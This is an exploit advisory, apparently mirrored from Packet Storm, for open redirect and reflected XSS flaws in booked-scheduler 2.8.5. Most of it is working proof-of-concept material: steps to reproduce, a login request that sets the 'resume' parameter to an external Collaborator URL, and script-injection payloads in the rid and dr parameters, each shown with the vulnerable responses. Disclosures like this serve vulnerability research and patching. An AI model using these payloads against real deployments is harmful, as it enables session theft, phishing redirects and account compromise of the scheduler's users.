Share
## https://sploitus.com/exploit?id=PACKETSTORM:182369
# Exploit Title: Open Redirect / Reflected XSS - booked-schedulerv2.8.5  
# Date: 10/2024  
# Exploit Author: Andrey Stoykov  
# Version: 2.8.5  
# Tested on: Ubuntu 22.04  
# Blog:  
https://msecureltd.blogspot.com/2024/10/friday-fun-pentest-series-13-reflected.html  
https://msecureltd.blogspot.com/2024/10/friday-fun-pentest-series-12-open.html  
  
  
Open Redirect:  
  
Steps to Reproduce:  
  
1. Login and intercept HTTP request with a proxy such as Burpsuite or ZAP  
2. In the "resume" parameter add the redirect URL e.g. Burp Collab  
3. Forward the request  
  
index.php  
  
// HTTP POST login request  
  
POST /Bookedbo8effotfu/Web/index.php HTTP/1.1  
Host: localhost  
Cookie: PHPSESSID=7c0a0ee0b401863e1a30acbebf301916; language=en_gb;  
fus_session=a15fcb9ef40abd1dece4c7fc35c2b58c; fus_visited=yes  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0)  
Gecko/20100101 Firefox/132.0  
[...]  
  
email=admin&password=password&captcha=&login=submit&resume=  
https://urp4vilyopoly8dhq6xa2z8v0m6du3is.oastify.com&language=en_gbg  
  
  
// HTTP response  
  
HTTP/1.1 302 Found  
Date: Sat, 12 Oct 2024 12:09:33 GMT  
Server: Apache  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
Location: https://urp4vilyopoly8dhq6xa2z8v0m6du3is.oastify.com  
Content-Length: 0  
Connection: close  
Content-Type: text/html; charset=UTF-8  
  
  
Reflected XSS:  
  
reservation.php  
  
// HTTP GET request  
  
GET  
/Bookedbo8effotfu/Web/reservation.php?rid="><script>alert(document.domain)</script>  
HTTP/1.1  
Host: localhost  
Cookie: PHPSESSID=7c0a0ee0b401863e1a30acbebf301916; language=en_gb;  
new_version=v%3D2.8.5%2Cfs%3D1728734988;  
fus_session=a15fcb9ef40abd1dece4c7fc35c2b58c; fus_visited=yes  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0)  
Gecko/20100101 Firefox/132.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-GB,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Dnt: 1  
Sec-Gpc: 1  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
Priority: u=0, i  
Te: trailers  
Connection: keep-alive  
  
  
// HTTP response  
  
HTTP/1.1 200 OK  
Date: Sat, 12 Oct 2024 12:23:55 GMT  
Server: Apache  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
Connection: close  
Content-Type: text/html; charset=UTF-8  
Content-Length: 14003  
  
<h5><a  
href="//localhost/Bookedbo8effotfu/Web/reservation.php?rid="><script>alert(document.domain)</script>">Return  
to the last page that you were on</a></h5>  
</div>  
  
  
schedule.php  
  
  
// HTTP GET request  
  
GET  
/Bookedldk0euwfjx/Web/schedule.php?dr="><script>alert(document.domain)</script>  
HTTP/1.1  
Host: localhost  
Cookie: PHPSESSID=c7aa15661bb6b0b72ab88132664b75c9; language=en_gb;  
resource_filter1=%7B%22ScheduleId%22%3A%221%22%2C%22ResourceIds%22%3A%5B%5D%2C%22ResourceTypeId%22%3Anull%2C%22MinCapacity%22%3Anull%2C%22ResourceAttributes%22%3A%5B%5D%2C%22ResourceTypeAttributes%22%3A%5B%5D%7D;  
schedule_calendar_toggle=false  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0)  
Gecko/20100101 Firefox/132.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-GB,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: none  
Sec-Fetch-User: ?1  
Priority: u=0, i  
Te: trailers  
Connection: keep-alive  
  
  
// HTTP response  
  
HTTP/1.1 200 OK  
Date: Sat, 19 Oct 2024 09:12:33 GMT  
Server: Apache  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
Connection: close  
Content-Type: text/html; charset=UTF-8  
Content-Length: 7853  
  
<h5><a  
href="//localhost/Bookedldk0euwfjx/Web/schedule.php?dr="><script>alert(document.domain)</script>">Return  
to the last page that you were on